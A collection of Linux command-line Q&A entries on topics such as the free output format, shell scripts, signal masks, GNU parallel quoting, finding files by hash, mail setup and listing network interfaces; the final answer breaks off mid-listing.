Somewhat confusingly, version 3.3.9 refers to the format without the buffers/cache line as the "old format", and you can see it in that version with free -o. So, all told, versions 3.3.9 and earlier show by default:

                 total       used       free     shared    buffers     cached
    Mem:           31G        30G       539M       1.1G       2.2G        15G
    -/+ buffers/cache:        13G        18G
    Swap:          31G       180M        31G

Versions 3.3.9 and earlier, with -o, show:

                 total       used       free     shared    buffers     cached
    Mem:           31G        30G       549M       1.1G       2.2G        15G
    Swap:          31G       180M        31G

Versions 3.3.10 and later only show:

                  total        used        free      shared  buff/cache   available
    Mem:            31G        7.8G        525M        1.1G         23G         22G
    Swap:           31G        180M         31G

Versions 3.3.10 and later also have a wide output mode, -w, which shows:

                  total        used        free      shared     buffers       cache   available
    Mem:            31G        7.8G        531M        1.1G        2.2G         20G         22G
    Swap:           31G        180M         31G

(This is all on the same system; note how the accounting is more accurate with the later versions.)
free command output: gentoo (redhat?) vs debian
1,515,164,174,000
I have a string which is separated by commas, like a,b,c,d,e,f, that I want to split into an array with the comma as separator. Then I want to print each element on a new line. The problem I'm having is that all the CLI tools I know so far (sed, awk, grep) only work on lines, so how do I get a string into a format that can be used by these tools? What I've tried so far is:

    echo "a,b,c,d,e,f" | awk -F', ' '{print $i"\n"}'

How can I get this output:

    a
    b
    c
    d
    e
    f

from this input: a,b,c,d,e,f?
Sticking with your awk, just make sure you understand the difference between a field and a record separator:

    echo "a,b,c,d,e,f" | awk 'BEGIN{RS=","}{$1=$1}1'

But the tr solution in the comments is preferable.
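The tr solution referred to above (from the original comments, which aren't included here) is simply a character-for-character translation:

```shell
# Translate each comma into a newline; no field or record handling needed.
echo "a,b,c,d,e,f" | tr ',' '\n'
```

This prints each element on its own line, and unlike the awk variant it involves no parsing at all, just byte substitution.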
Split string into array and print each element on a new line with commandline
1,515,164,174,000
Is it possible to run a single shortened command that would in turn initiate multiple longer-to-type commands? For instance,

    $ kontact & rekonq

when passed to my terminal opens two applications. Could I create a command of my own to include this action and shorten the time it takes to perform it?
I think what you're looking for is a shell script. A shell script basically lets you turn anything you can type into the shell into a command. So, for example, to run those two programs from a shell, you'd run:

    $ kontact &
    $ rekonq &

To put those in a shell script, open a new file in a text editor and put in the following lines:

    #!/bin/bash
    kontact &
    rekonq &

You'll note that's very similar to what you typed in the shell; the only difference is the #!/bin/bash line up top. That line tells the system that this is a script that should be executed by bash.

Finally, after saving the file, you need to make it executable with chmod +x file-name. Now, hypothetically, if you saved that as /home/your-username/bin/run-my-programs, you could just type ~/bin/run-my-programs into your shell, and both of those programs should start up.

Note that many distros have login scripts that will add a bin directory in your $HOME to your command search path automatically, so that is a great place to put shell scripts that you'd like to easily run. They will only do this, though, if $HOME/bin exists when you log in. Then you could leave out the path and just type run-my-programs. Obviously, you need to be careful naming your scripts so they don't conflict with other programs on your system; it'd be confusing and surprising had you named that ls, for example!

The above shell script isn't really that useful. It's more useful when your programs are more complicated.
For example, this is a real script I use at work:

    #!/bin/sh
    xterm -geometry 80x24+0+0 -T 'Bennu-DBA' -e ssh bennu -t 'screen -d -R -S status' &
    xterm -geometry 80x24+0+342 -e screen -S 'bservers' -c ~/.screenrc-bservers &
    xterm -geometry 80x9+0+684 -T 'df-graph' -xrm '.xterm.vt100.allowTitleOps: no' &
    ( cd ~/src/haruhi.metrics.net/operations/backup/bennu && xterm -geometry 80x24+0+827 -T 'Bennu-Conf' ) &
    ( cd ~/src/haruhi.metrics.net/operations/backup/phoenix && xterm -geometry 80x24+509+827 -T 'Bennu-Conf' ) &
    xterm -geometry 177x77+509+0 -T 'Console' -e screen -c ~/.screenrc-bconsole &

That saves a bunch of work manually placing and resizing windows (all those -geometry options), and all the -e options start up appropriate programs in them.
is it possible to create a macro-like user defined shell command?
1,515,164,174,000
I have strange behavior on my system. When I invoke a command in the shell (bash version 4.2.45(1)-release), say top or cat, the running process does not respond to Ctrl+C. I even tried kill -2 <pid> and kill -15 <pid>, but that didn't help. However, I can kill processes with SIGKILL. I own the process; I even tried to send signals 2 and 15 to the process as root, but it did not respond. I can quit top if I press q.

Any ideas about the problem, or any hints for troubleshooting it?

Update 1: cat and top were just examples; all processes show the same behavior. I wrote a simple program that only sleeps (without a signal handler) and saw the same behavior.

Update 2: I wrote a small program that only sleeps, this time installing signal handlers to catch SIGTERM and SIGINT. When I invoked kill -15 <pid> (and likewise -2), my program did not receive the signal! I also updated the kernel to 3.11.10-100.fc18.i686 and still have the same problem.
Recent versions of the nVidia proprietary drivers (possibly combined with other recent versions of libraries) have a bug which causes them to corrupt the signal mask. You can look at signal masks like this:

    anthony@Zia:~$ ps -eo blocked,pid,cmd | egrep -v '^0+ '
                 BLOCKED   PID CMD
    fffffffe7ffbfeff       605 udevd --daemon
    0000000000000002      4052 /usr/lib/policykit-1/polkitd --no-debug
    0000000000087007      4646 /usr/sbin/mysqld --basedir=/usr […]
    0000000000010000     15508 bash

That's about what it should look like. If you run that on a system with the proprietary nVidia drivers, you'll see all kinds of crazy values for BLOCKED in many of your programs, including, likely, all the misbehaving ones. Note that signal masks are passed from parent to child through fork/exec, so once a parent process has a corrupt one, all the children it spawns from that point forward will, too.

See also my question "After upgrade, X button in titlebar no longer closes xterm" and the various distro bugs you'll be able to find now, knowing which package to look at. You can modify the code in my answer to that question to reset the signal mask to none blocked (elide sigaddset and change SIG_UNBLOCK to SIG_SETMASK).
Processes do not respond to my signals
1,515,164,174,000
I have a custom $PS1 variable that renders correctly on my command line, but unfortunately renders incorrectly in Emacs with M-x shell (the original post included screenshots of both). Here is my $PS1 variable:

    export PS1='\[\e]0;\u@\h: \w\a\]\[\e[0;36m\]\T \[\e[1;30m\]\[\e[0;34m\]\u@\H\[\e[1;30m\] \[\e[0;32m\]\[\e[1;37m\]\w\[\e[0;37m\] \$ '

How can I make Emacs shell-mode look the same as my CLI prompt?
Leave the set-title part to the terminals that support it:

    case $TERM in
      (xterm*) set_title='\[\e]0;\u@\h: \w\a\]';;
      (*)      set_title=
    esac
    PS1=$set_title'\[\e[0;36m\]\T \[\e[1;30m\]\[\e[0;34m\]\u@\H\[\e[1;30m\] \[\e[0;32m\]\[\e[1;37m\]\w\[\e[0;37m\] \$ '
Emacs shell mode makes $PS1 different
1,515,164,174,000
When I play music with vlc or cvlc in a terminal or console, there is always this non-stopping output (shown below) that prevents me from issuing commands by pressing the Enter key. I want to disable it. I tried starting vlc with the -q switch for quiet mode, but it only gets rid of the [ ] bracket parts; the rest still remains and continues to grow.

So, how can I make vlc show none of this information at all, while still being able to execute command-line commands like next, play, random, etc.?

    VLC media player 2.0.7 Twoflower (revision 2.0.6-54-g7dd7e4d)
    [0x255e418] dummy interface: using the dummy interface module...
    libdvdnav: Using dvdnav version 4.2.0
    libdvdread: Encrypted DVD support unavailable.
    libdvdread: Attempting to use device /dev/sdb1 mounted on /run/media/easl/freyja for CSS authentication
    libdvdread: Could not open input: Permission denied
    libdvdread: Can't open /dev/sdb1 for reading
    libdvdread: Device /dev/sdb1 inaccessible, CSS authentication not available.
    libdvdnav:DVDOpenFilePath:findDVDFile /VIDEO_TS/VIDEO_TS.IFO failed
    libdvdnav:DVDOpenFilePath:findDVDFile /VIDEO_TS/VIDEO_TS.BUP failed
    libdvdread: Can't open file VIDEO_TS.IFO.
    libdvdnav: vm: failed to read VIDEO_TS.IFO
    [0x24966b8] main playlist: stopping playback
    TagLib: MPEG::Header::parse() -- Invalid sample rate.
    TagLib: ID3v2.4 no longer supports the frame type TDAT.  It will be discarded from the tag.
    TagLib: MPEG::Header::parse() -- Invalid sample rate.
    TagLib: MPEG::Header::parse() -- Invalid sample rate.
    TagLib: ID3v2.4 no longer supports the frame type TDAT.  It will be discarded from the tag.
    TagLib: MPEG::Header::parse() -- Invalid sample rate.
You should be able to get rid of the output of the libraries by redirecting stderr away:

    cvlc -q mymedia 2> /dev/null

As for the commands, I'm not sure vlc accepts commands from plain stdin, but it sounds like the rc interface might be what you're looking for:

    cvlc -q -Irc mymedia 2> /dev/null
How to disable VLC output in command-line mode?
1,515,164,174,000
I would like to find a command line or a script that will show me whether an HTML5 player is running in a browser (Firefox or Chromium). For example, to determine if Flash Player is running in a browser, I use this command:

    pgrep -lfc ".*((c|C)hrome|chromium|firefox|).*flashp.*"
I don't see how this would be feasible, given that HTML5 support is typically built into the browser directly, whereas Adobe Flash is a plugin. You can see what is a plugin in Chrome by browsing to the chrome://plugins page, where, for example, the Adobe Flash plugin is listed. (The original answer included a screenshot of that page here.)

HTML5, on the other hand, doesn't have any corresponding plugin, so you won't see a process getting forked from Chrome when it's dealing with this type of content.
How can I determine if HTML5 player is running in browser?
1,515,164,174,000
From time to time I need to dig through huge log files (several GB unpacked) to debug a specific error. vim is OK for browsing through the file, but when I need to find something in it, it's completely useless. Is there some tool that could index the log and allow me to search the file faster? Ideally a command-line tool.

Edit: just to clarify, tools like ack or grep aren't suitable, since I need to examine the context of the matches and -C, -A, -B just aren't good enough. Plus, ack and grep are still unusably slow.
There are really good log indexers that are a bit bigger than command-line-tool level. Commercially, Splunk is the big one and hard to beat. Graylog2 is a nice open-source implementation. Elasticsearch + Logstash are quite good too. There is a fair bit of overhead in setting them up to collect logs and in running the collection server, but once you have central log collection as a part of your system, they're great. Querying and reporting logs from multiple sources is the biggest benefit for multi-tiered apps.

As for the command line, if you can plug your logging into syslog, the systemd journald implementation allows indexing on a number of fields as items are logged. I'm not sure that would be useful in text processing, though; it's more for the metadata. I'm also not sure about ad hoc command-line tools; they would still incur an extract/load/parse time penalty each time you load the file.

That being said, less does most of what I need in a single log file:

    &pattern     display only lines matching pattern (like grep)
    /pattern     search forward
    ?pattern     search backward
    Shift-F      tail -f mode

The tail -f mode can take the previous pattern into consideration as well, which is great for watching live logs.
Digging through huge gziped log files
1,515,164,174,000
I have in the past heard of using nail for this task, but I can't seem to find it for my distribution (Ubuntu 11.04) in any of the repositories. What program can I use to send one-off emails from a shell, like so:

    send-mail -to [email protected] -file attachment.zip -message "Hello World"

Is there a program out there through which I can script mail sending as above?
nail was renamed to Heirloom mailx. For Ubuntu, you want to install the heirloom-mailx package, and then read the Sending mail from scripts section of the manpage.
How can I automate sending mail using a script?
1,515,164,174,000
On Linux I use the flock command to execute a command under an exclusive lock. What is the standard operating system command on Solaris 10 to do the same in a shell?
After a small Usenet discussion I use the following as a workaround for flock -n lockfile -c command:

    #! /bin/bash

    if [ $# != 4 -o "$1" = '-h' ] ; then
        echo "Usage: flock -n lockfile -c command" >&2
        exit 1
    fi

    lockfile=$2
    command=$4

    set -o noclobber
    if 2>/dev/null : > "$lockfile" ; then
        trap 'rm -f "$lockfile"' EXIT
        $BASH -c "$command"
    else
        exit 1
    fi
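The core trick in that script, shown in isolation: with noclobber set, `: > file` succeeds only if the file does not already exist, which makes creating the lock file an atomic test-and-set. A minimal sketch using a throwaway path:

```shell
# With noclobber, ": > file" fails if the file already exists, so
# creating the lock file doubles as acquiring the lock.
lock=$(mktemp -u)    # a path that does not exist yet
set -o noclobber

if : > "$lock" 2>/dev/null; then echo acquired; else echo busy; fi
if : > "$lock" 2>/dev/null; then echo acquired; else echo busy; fi

rm -f -- "$lock"
```

The first attempt prints "acquired" and the second "busy", because the file now exists and noclobber refuses to truncate it. The atomicity comes from the O_EXCL-style open the shell performs for a noclobber redirection.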
How to lock on Solaris 10?
1,515,164,174,000
I often use Lynx on a remote computer to look at websites (faster than port forwarding). Sometimes the URLs I want to go to have unescaped characters (for example brackets) that Lynx seems to need encoded. For example,

    http://www.example.com/This(URL)is anExample.html

should be:

    http://www.example.com/This%28URL%29is%20anExample.html

Is there an existing script for this? Alternatively, is there some option for Lynx that would make it unnecessary?
You can escape a string on the command line by using single quotes, so

    lynx 'http://www.example.com/This(URL)is anExample.html'

will pass the URL unchanged to lynx, or any other program.
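If you do want to generate the percent-encoded form rather than just quoting, here is a small bash sketch; note that the set of characters it leaves unencoded is a simplification for this use case, not the full RFC 3986 rules:

```shell
# Percent-encode every character outside a conservative allowed set.
# Simplified sketch, not a complete RFC 3986 implementation.
urlencode() {
    local s=$1 out= c i
    for ((i = 0; i < ${#s}; i++)); do
        c=${s:i:1}
        case $c in
            [a-zA-Z0-9._~/:-]) out+=$c ;;                # keep as-is
            *) printf -v c '%%%02X' "'$c"; out+=$c ;;    # encode the byte
        esac
    done
    printf '%s\n' "$out"
}

urlencode 'http://www.example.com/This(URL)is anExample.html'
# -> http://www.example.com/This%28URL%29is%20anExample.html
```

The `"'$c"` argument uses printf's numeric conversion of a leading-quote string to get the character's code point, which is then formatted as a two-digit hex escape.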
Using URLs with parenthesis with Lynx
1,515,164,174,000
Before you hit me with the obvious: I know the --backup option makes a backup of a file. But the cp command in general copies a file, and one could argue a copy of a file is a backup. So, more precisely, my question is: what does the -b option do that the cp command doesn't do already?

The cp(1) man page gives the following description of the --backup option:

    make a backup of each existing destination file

This definition isn't very useful; it basically says "the backup option makes a backup" and gives no indication as to what -b adds to cp. I know -b puts some suffix at the end of the name of the new file. But is there anything else it does, or is that it? Is a -b backup just a cp command that adds something to the end of the filename?

P.S. Do you typically use -b when making backups in your daily work, or do you just stick to -a?
It makes a backup copy of each destination file that already exists, i.e. the ones that would otherwise get overwritten and lost:

    $ mkdir foo; cd foo
    $ echo hello > hello.txt
    $ echo world > world.txt
    $ cp -b hello.txt world.txt
    $ ls
    hello.txt  world.txt~  world.txt
    $ cat world.txt
    hello
    $ cat world.txt~
    world

That world.txt~ is the backup file it created. If you look closely, you'll see that the backup file is actually the original file, just renamed (i.e. the inode number stays the same, and so do e.g. the permissions of that file).
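Beyond the default ~ suffix, GNU cp also lets you choose the backup naming scheme; a quick sketch in a throwaway directory (assuming GNU coreutils):

```shell
# GNU cp backup variations, demonstrated in a temporary directory.
cd "$(mktemp -d)"
echo hello > hello.txt
echo world > world.txt

# Numbered backups: the overwritten file is kept as world.txt.~1~
cp --backup=numbered hello.txt world.txt

# Simple backup with a custom suffix: kept as world.txt.bak
cp --backup=simple --suffix=.bak hello.txt world.txt

ls
cat world.txt.~1~    # the original "world" contents survive here
```

The default behavior of plain -b (--backup=existing via the VERSION_CONTROL environment variable) makes numbered backups if any already exist for that file, and simple ones otherwise.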
What precisely does cp -b (--backup) actually do?
1,515,164,174,000
This thread (https://superuser.com/questions/659876/how-to-rename-files-and-replace-characters) has proven bountiful and does what I need it to do, except that I need to replace just the first instance of a character in a filename. How can I change this:

    for f in *:*; do mv -v "$f" $(echo "$f" | tr '.' '_'); done

so that it only replaces the first instance of . in a filename, for a filename such as:

    2022-10-07T071101.8495077Z_QueryHistory.txt
Unfortunately, the method you tried is more complex than it needs to be, and fragile (it breaks if file names contain certain special characters). Here's a simpler method relying on parameter expansion to transform the file name:

    for f in *; do mv -v -- "$f" "${f/./_}"; done     # replace the first .
    for f in *; do mv -v -- "$f" "${f//./_}"; done    # replace every .

This requires bash, ksh or zsh as the shell: other shells such as dash (which is Ubuntu's /bin/sh, so commonly used for scripting, but hardly ever used interactively) don't have the ${VARIABLE/PATTERN/REPLACEMENT} form of parameter expansion.

Alternatively, you can use prename (apt install rename):

    rename 's/\./_/' *      # replace the first .
    rename 's/\./_/g' *     # replace every .

Alternatively, you can use zsh's zmv:

    autoload -U zmv             # put this in your .zshrc
    zmv '*' '${f/./_}'          # replace the first .
    zmv -W '*.*.*' '*_*.*'      # replace the next-to-last .
    zmv '*' '${f//./_}'         # replace every .

All the snippets in my answer skip files whose name begins with a dot.
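You can preview the expansion on a plain string before touching any files:

```shell
# ${f/pattern/repl} replaces only the first match;
# ${f//pattern/repl} replaces every match.
f='2022-10-07T071101.8495077Z_QueryHistory.txt'
echo "${f/./_}"     # first dot only
echo "${f//./_}"    # every dot
```

Running this shows the first form leaving the .txt extension intact while the second form rewrites it too, which is exactly the distinction the question is after.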
Linux: rename files in loop while only targeting the first instance of a specific character
1,515,164,174,000
I installed tcpdump, but when I try to run it the shell reports "command not found". I also used the whereis and which commands to check whether the package exists, and it does exist.
It is installed to /usr/sbin/tcpdump, since tcpdump is supposed to run as the root user or with equivalent privilege. To verify that, you can use dpkg -L to show where the installed files are located on disk:

    $ dpkg -L tcpdump
    /.
    /etc
    /etc/apparmor.d
    /etc/apparmor.d/usr.sbin.tcpdump
    /usr
    /usr/sbin
    /usr/sbin/tcpdump      <- Here it is!
    /usr/share
    /usr/share/doc
    /usr/share/doc/tcpdump
    ...

So, you can either run it with sudo tcpdump as a normal user, switch to the root user first and then run tcpdump, or add /usr/sbin to your PATH environment variable.
I installed tcpdump, but it is showing command not found while using it
1,515,164,174,000
It happens every now and then that there's an application installed on my system which I don't know how to run from the command line. To find out, I usually Google it or search the output of lsof (not always successfully) after running the application from the GUI. There has to be an easier way. What is it?
Applications which you can start from your desktop environment are described by .desktop files, which are stored in /usr/share/applications and ~/.local/share/applications (strictly speaking, the corresponding XDG directories, but those are the default settings). Given an application name, as shown by your desktop environment, you can look for it in those files and find the corresponding Exec line.

To do this, you can use GUI menu editors such as GNOME's Alacarte or MenuLibre, or search on the command line. Alacarte ("Main Menu" in GNOME) shows all available applications, and the properties of each entry show the corresponding command.

In a terminal window, a "Users" application can be found using:

    grep -l Name.\*=Users {/usr,~/.local}/share/applications/*.desktop | xargs -r grep Exec=

This shows:

    Exec=gnome-control-center user-accounts

and true enough, gnome-control-center user-accounts on the command line opens the corresponding panel. For DB Browser, you'd run:

    grep -l "Name.*=DB Browser" {/usr,~/.local}/share/applications/*.desktop | xargs -r grep Exec=

In some cases the Exec line will have additional arguments, e.g. %f; those are placeholders for arguments such as files.
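To try the pipeline without depending on what happens to be installed, you can point it at a throwaway directory containing a made-up .desktop file (the entry below is fabricated for illustration):

```shell
# Create a minimal, made-up .desktop entry in a temporary directory
# and extract its Exec line with the same grep | xargs pipeline.
d=$(mktemp -d)
cat > "$d/users.desktop" <<'EOF'
[Desktop Entry]
Name=Users
Exec=gnome-control-center user-accounts
EOF

grep -l 'Name.*=Users' "$d"/*.desktop | xargs -r grep Exec=
```

The first grep narrows the candidates down to files whose Name matches, and the second pulls out the Exec line from just those files.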
How to tell what command opens an application?
1,515,164,174,000
I want the output of the time command to be shown only if the command passed to time was successful, something like this:

    ( time wget -pq --delete-after https://www.example.com ) 2>&1 || echo fail

The problem is that if wget fails, I still receive the output from time (which is somewhat logical, as it measures how long the command took to fail anyway). My goal is to save the output to a variable and have either 0m0.100s or fail in the variable. Does anyone have an idea how I could do this in a decent manner?
You can do something like this:

    $ if var=$( { time true; } 2>&1 ); then echo "$var"; else echo fail; fi

    real    0m0.000s
    user    0m0.000s
    sys     0m0.000s
    $ if var=$( { time false; } 2>&1 ); then echo "$var"; else echo fail; fi
    fail
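Wrapped into a small bash function (a sketch; the awk step just extracts the "real" line from bash's time output, and the function name is made up):

```shell
# Print the elapsed wall-clock time if the command succeeds,
# or "fail" otherwise.
timed() {
    local out
    if out=$( { time "$@" > /dev/null 2>&1; } 2>&1 ); then
        printf '%s\n' "$out" | awk '/^real/ { print $2 }'
    else
        echo fail
    fi
}

timed true     # prints something like 0m0.001s
timed false    # prints fail
```

The command substitution's exit status is that of the command run under time, so the if branch picks the right output, and the inner redirection keeps the command's own output out of the captured timing text.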
Display output of `time` only if command after `time` was successful
1,515,164,174,000
When I run duplicity with the -v8 switch, I get the following output:

    M home/user/Documents/test.txt
    D home/user/VirtualBox VMs/win10/Logs/VBox.log.2
    A home/user/.config/VirtualBox/example.log

What do the capital letters in front of the paths mean?
I could not find this documented (probably my Google-fu is lacking), but the flags you mentioned, A, D, and M, appear to stand for "added", "deleted", and "modified", respectively, according to the source code (in diffdir.py):

    log.Info(_("A %s") % (util.ufn(delta_path.get_relative_path())),
             log.InfoCode.diff_file_new,
             util.escape(delta_path.get_relative_path()))
    (...)
    log.Info(_("D %s") % (util.ufn(sig_path.get_relative_path())),
             log.InfoCode.diff_file_deleted,
             util.escape(sig_path.get_relative_path()))
    (...)
    log.Info(_("M %s") % (util.ufn(delta_path.get_relative_path())),
             log.InfoCode.diff_file_changed,
             util.escape(delta_path.get_relative_path()))
What does the A, D and Ms mean when running Duplicity with high verbosity?
1,515,164,174,000
How can I receive the output of two or more independent processes in a third location without affecting the two processes?

I have two processes, A and B, each running in its own screen, continuously outputting stuff. I can run screen and attach to A to see its output:

    12:00 Foo.
    12:02 Foo.
    12:04 Foo.

Same with B:

    12:01 Bar.
    12:03 Bar.
    12:05 Bar.

And I can combine multiple screens to see both side by side or similar. But I am looking for a way to see the output of these two processes combined into one "stream" of messages:

    12:00 Foo.
    12:01 Bar.
    12:02 Foo.
    12:03 Bar.
    12:04 Foo.
    12:05 Bar.

while also not being able to inadvertently send something like Ctrl+C to one of the processes. (I still want to be able to reattach to the processes and interact with them from time to time, which is why I've been using screen.) Thus I don't think I would want to run the two processes together and look at the output directly.

I could use strace to do something like this:

    strace -p PIDofA -e write &
    strace -p PIDofB -e write &

But the output is not very pretty:

    write(1, "12:00 Foo.", 10) = 10
    write(5, "Foo in file.", 12) = 12
    write(1, "12:01 Bar.", 10) = 10
    write(5, "Bar in file.", 12) = 12
    ...

and it doesn't feel like a good solution to run multiple strace processes this way to get the combined output.

Perhaps I could make both processes write to a file and do something like:

    tail -f output.txt

But I'm not sure if that will cause problems as the file gets filled with more and more lines of output, and I'm not sure what happens when two processes attempt to write to the same file at the same time.

So what tool do I use, or how do I redesign my processes, to display the output of A and B together? (I'm running this on Debian and accessing it through SSH, if that makes a difference.)
You can pipe the output of each command to tee file and tail -f the file. There is no synchronization between the processes, so the output will be interleaved (in possibly ugly fashion). If you are worried about filling up the disk, you might be able to output to a named pipe instead:

    [first screen]
    $ mkfifo /tmp/foo
    $ tail -f /tmp/foo

    [second screen]
    $ command1 | tee /tmp/foo

    [third screen]
    $ command2 | tee /tmp/foo
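A miniature, self-terminating version of the regular-file variant (a sketch: the timestamps are made up, and in real use the writers would be the long-running processes and the reader would be tail -f rather than cat):

```shell
# Two "processes" append their lines to a shared log via tee -a;
# a third location reads the combined stream. Using tee -a (append)
# keeps the writers from clobbering each other's file offset.
log=$(mktemp)
echo "12:00 Foo." | tee -a "$log" > /dev/null
echo "12:01 Bar." | tee -a "$log" > /dev/null
echo "12:02 Foo." | tee -a "$log" > /dev/null

cat "$log"
rm -f -- "$log"
```

With the named-pipe variant above, nothing accumulates on disk, but a reader must be attached or the writers will block.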
Combine output from multiple independent processes in another terminal
1,515,164,174,000
I'm trying to use GNU Parallel to run a command multiple times with a combination of constant and varying arguments, but for some reason the constant arguments are split on whitespace even though I've quoted them when passing them to parallel. In this example, the constant argument 'a b' should be passed to debug-call as a single argument instead of two:

    $ parallel debug-call 'a b' {} ::: {1..2}
    [0] = '[...]/debug-call'
    [1] = 'a'
    [2] = 'b'
    [3] = '1'
    [0] = '[...]/debug-call'
    [1] = 'a'
    [2] = 'b'
    [3] = '2'

debug-call is a simple script which prints each argument it has been passed in argv. Instead I would expect to see this output:

    [0] = '[...]/debug-call'
    [1] = 'a b'
    [2] = '1'
    [0] = '[...]/debug-call'
    [1] = 'a b'
    [2] = '2'

Is this a bug, or is there an option to prevent GNU Parallel from splitting command-line arguments before passing them on to the command?
parallel runs a shell (which exact one depends on the context in which it is called; generally, when called from a shell, it's that same shell) to parse the concatenation of the arguments. So:

    parallel debug-call 'a b' {} ::: 'a b' c

is the same as:

    parallel 'debug-call a b {}' ::: 'a b' c

parallel will call:

    your-shell -c 'debug-call a b <something>'

where <something> is the arguments (hopefully) properly quoted for that shell. For instance, if that shell is bash, it will run:

    bash -c 'debug-call a b a\ b'

Here, you want:

    parallel 'debug-call "a b" {}' ::: 'a b' c

or:

    parallel -q debug-call 'a b' {} ::: 'a b' c

where parallel will quote the arguments (in the correct syntax for the shell, hopefully) before concatenating.

To avoid calling a shell in the first place, you could use GNU xargs instead:

    xargs -n1 -r0 -P4 -a <(printf '%s\0' 'a b' c) debug-call 'a b'

That won't invoke a shell (nor any of the many commands run by parallel upon initialisation), but you won't benefit from any of the extra features of parallel, like output reordering with -k. You may find other approaches at "Background execution in parallel".
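The underlying issue can be reproduced with a bare sh -c, with no parallel involved: quotes on the outer command line are consumed by the outer shell, so only quotes written inside the -c string reach the inner shell's parser (printf stands in for debug-call here):

```shell
# Unquoted inside the -c string: a and b arrive as two arguments.
sh -c 'printf "<%s>\n" debug-call a b 1'

# Quoted inside the -c string: "a b" arrives as one argument.
sh -c 'printf "<%s>\n" debug-call "a b" 1'
```

This is exactly why `parallel 'debug-call "a b" {}'` works: the inner quotes survive into the command string that the spawned shell parses.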
Prevent GNU parallel from splitting quoted arguments
1,515,164,174,000
I have a file x1 in one directory (d1), and I'm not sure whether the same file has already been copied (as x2) into another directory (d2), but automatically renamed by an application. Can I check whether the hash of file x1 from directory d1 is equal to the hash of some file x2 existing in directory d2?
This is a good approach, but the search will be a lot faster if you only calculate hashes of files that have the right size. Using GNU/BusyBox utilities:

    wanted_size=$(stat -c %s d1/x1)
    wanted_hash=$(sha256sum <d1/x1)
    find d2 -type f -size "${wanted_size}c" \
        -execdir sh -c 'test "$(sha256sum <"$0")" = "$1"' {} "$wanted_hash" \; -print
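A self-contained run of the same idea against throwaway files (the directory layout and file names here are made up for illustration):

```shell
# Build a tiny d1/d2 layout, then locate the d2 file whose size and
# SHA-256 hash match d1/x1. The -size pre-filter avoids hashing files
# that cannot possibly match.
tmp=$(mktemp -d)
mkdir -p "$tmp/d1" "$tmp/d2"
echo 'same content'  > "$tmp/d1/x1"
echo 'same content'  > "$tmp/d2/renamed-copy"
echo 'other content' > "$tmp/d2/unrelated"

wanted_size=$(stat -c %s "$tmp/d1/x1")
wanted_hash=$(sha256sum < "$tmp/d1/x1")
find "$tmp/d2" -type f -size "${wanted_size}c" \
    -execdir sh -c 'test "$(sha256sum <"$0")" = "$1"' {} "$wanted_hash" \; -print
```

Only the path of renamed-copy is printed: unrelated fails the size test before any hash is computed, and anything that passed the size test but hashed differently would be filtered by the -execdir predicate.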
Find a file by hash
1,515,164,174,000
As part of our project we must classify sound samples (stored as .wav files). All samples are of the same kind: pure speech (like a Skype test call). The process is the following:

    - a reference wav: this is the "high quality" sample
    - compare approx. 1000 wav files against it
    - calculate the divergence from the reference wav, one file at a time

Is there any Linux tool for that?
What I believe you are trying to measure (by stating divergence) is the PESQ, Perceptual Evaluation of Speech Quality, of each file. This is standardized as ITU-T recommendation P.862 (02/01): http://en.wikipedia.org/wiki/PESQ. There are different projects implementing what you are searching for, for example https://github.com/imankulov/speex-quality-evaluation
Comparing .wav samples from command line
1,515,164,174,000
I am working on the computer at home and I want to send myself an email, so I tried:

    uuencode all.sh all.sh | mail [email protected]

The problem is that nothing arrives at my email; I just get the following error:

    mail: cannot send message: Process exited with a non-zero status

The fact is that I use the same command at work and it works well. I would appreciate any suggestion to fix this problem. I am not sure if I have to set up any file before using that command line on my personal computer. I also tried installing mutt:

    mutt [email protected] < all.sh

but I got the following error:

    sendmail: Cannot open mail:25
    Error sending message, child exited 1 ().
    Could not send the message.
The basic mail command is only a mail reader and composer; it doesn't know how to talk to a server over the network (with the SMTP protocol). Talking SMTP is the job of an MTA (message transfer agent). The default MTA on Ubuntu is Postfix. To configure Postfix, run:

    sudo dpkg-reconfigure postfix

If you only want to send mail and not receive any, choose "Satellite system". Note that unless you have a permanently-connected machine, with suitable DNS entries, and preferably with a static IP address, you can't directly receive mail: you have to use an external server, and then fetch the mail using a protocol such as IMAP.

Ubuntu includes several versions of the mail command. The heirloom-mailx version does know how to talk SMTP. You configure it in ~/.mailrc. The configuration might look something like this:

    set smtp=smtp.example.com
    set smtp-use-starttls
    set smtp-auth-user=neo33
    set smtp-auth-password=swordfish
What should I configure to send mail on the command line?
1,515,164,174,000
I am looking to retrieve a list of network interfaces. Currently I am returning the results of ip addr and then doing some regex/string searching from output like this:

    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
        link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
        inet 127.0.0.1/8 scope host lo
           valid_lft forever preferred_lft forever
        inet6 ::1/128 scope host
           valid_lft forever preferred_lft forever
    84: eth0@if85: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
        link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
        inet 172.17.0.2/16 scope global eth0
           valid_lft forever preferred_lft forever
        inet6 fe80::42:acff:fe11:2/64 scope link tentative
           valid_lft forever preferred_lft forever

I don't really care about all the meta data, I am just looking for the interface names. So I would like to instead get:

    1: lo
    84: eth0@if85

Is there a way to filter the results of the ip addr command? I can definitely do some other cli magic or just regex magic in my app, but it'd be nice to have ip itself filter.
Yes, you can. Using grep with PCRE (-P):

    ip addr | grep -Po '^\d+:\s+\K[^:]+'

^\d+:\s+ matches the portion before the interface name at the start, \K discards the match, and [^:]+ gets the portion up to the next ':', i.e. the interface name.

Similar logic using sed:

    ip addr | sed -nE 's/^[[:digit:]]+:[[:blank:]]+([^:]+).*/\1/p'

On my system:

    % ip addr | grep -Po '^\d+:\s+\K[^:]+'
    lo
    eth0
    wlan0
    % ip addr | sed -nE 's/^[[:digit:]]+:[[:blank:]]+([^:]+).*/\1/p'
    lo
    eth0
    wlan0

What you should really do: the Linux kernel provides an interface for peeking into the hardware, sysfs, mounted on /sys. You can get the interface names by just going to the appropriate location of /sys, the /sys/class/net/ directory precisely. On my system:

    % ls -1 /sys/class/net/
    eth0
    lo
    wlan0

Each of these is a directory, with the subdirectories containing files and directories holding all the info regarding the interface. Here's the listing of the contents of the /sys/class/net/eth0 directory:

    % ls -1 /sys/class/net/eth0
    addr_assign_type
    address
    addr_len
    broadcast
    carrier
    carrier_changes
    device
    dev_id
    dev_port
    dormant
    duplex
    flags
    gro_flush_timeout
    ifalias
    ifindex
    iflink
    link_mode
    mtu
    name_assign_type
    netdev_group
    operstate
